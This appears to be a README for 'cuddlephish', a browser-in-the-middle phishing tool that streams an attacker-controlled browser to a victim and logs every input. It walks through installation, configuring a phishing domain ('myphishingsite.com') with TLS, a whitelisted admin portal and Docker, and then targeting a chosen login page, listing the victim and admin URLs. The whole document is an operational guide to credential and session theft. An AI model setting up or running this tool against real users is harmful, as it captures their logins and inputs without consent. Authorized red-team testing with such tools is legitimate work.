cuddlephish

Weaponized Browser-in-the-Middle (BitM). Stream a video of your browser to the user’s browser and log every input.

Setup

git clone https://github.com/fkasler/cuddlephish
cd cuddlephish
sudo bash install_deps.sh

Edit Caddyfile with your domain and Gandi (or other registrar) API key.

Caddyfile

(proxy_upstream) {
    <REDACTED>
}
# Personal Domain (just modify the domain and API key)
myphishingsite.com *.myphishingsite.com {
       tls {
               dns gandi GANDI_API_KEY
       }
       # Use the proxy_upstream code snippet (defined above)
       import proxy_upstream
}

# Local
127.0.0.1:<MYPORT> {
        tls internal
        import proxy_upstream
}

Edit config.json with with a more secure socket key and your own IP to be whitelisted to access the admin portal.

config.json

{
  "default_user_agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36",
  "socket_key": "abc123",
  "admin_ips": ["<MyIP>", "127.0.0.1"]
}

Run docker app

sudo docker build -t caddy .

sudo docker run --rm \     
  -p <PublicPort>:<MYPORT> \
  -v $PWD/Caddyfile:/etc/caddy/Caddyfile \
  --network=host \
  caddy:latest

Run the attack module on a target

node add_target.js
> URL of Login Page to Target: <TARGET URL>
# cat target.js to see name root element

node index.js <NAME>

For the victim:

https://127.0.0.1:<PublicPort>/
https://<DOMAIN>/

Console Admin:

https://127.0.0.1:<PublicPort>/admin
https://<DOMAIN>/admin